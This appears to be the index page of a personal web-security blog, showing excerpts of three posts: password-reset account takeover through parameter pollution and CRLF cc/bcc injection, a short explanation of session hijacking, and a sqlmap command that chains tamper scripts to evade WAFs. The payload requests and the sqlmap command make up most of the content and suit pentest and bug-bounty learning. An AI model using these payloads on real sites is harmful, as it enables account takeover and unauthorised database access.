4 Years :-) I got full time job and Just couldn't get enough time to update the blog, but I promise to keep posting off and on now. Life’s Good Alhamdulillah! Cheers & Happy 2026!
Posts
Account Takeover: Password Reset With Manipulating Email Parameter
Exploitation Add attacker email as second parameter using & 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com & email = attacker@email . com Copied! Add attacker email as second parameter using %20 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com % 20 email = attacker@email . com Copied! Add attacker email as second parameter using | 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com | email = attacker@email . com Copied! Add attacker email as second parameter using cc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dcc:attacker@mail.tld" Copied! Add attacker email as second parameter using bcc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dbcc:attacker@mail.tld" Copied! Add attacker email as second parameter using , 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld" , email = "attacker@mail.tld" Copied! Add attacker email as second parameter in json ar...
What is Session Hijacking
Session hijacking is a combination of interception and injection. It allows an attacker to avoid password protections by taking over an existing connection once authentication is complete. For example, if I am sniffing your network, I might be aware that you have a Telnet session between your network management system on address 10.0.0.1 and your key system 10.0.0.100. If I send a series of packets to the NMS on 10.0.0.1 that causes you to drop the connection but at the same time continue to send packets to 10.0.0.100 with a spoofed address of 10.0.0.1, I have hijacked the session.
SQLMAP Tamper Scripts WAF bypass
Use and load all tamper scripts to evade filters and WAF: sqlmap -u ‘ http://www.site.com/search.cmd?form_state=1 ’ — level=5 — risk=3 -p ‘item1’ — tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords General Tamper testing: tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus...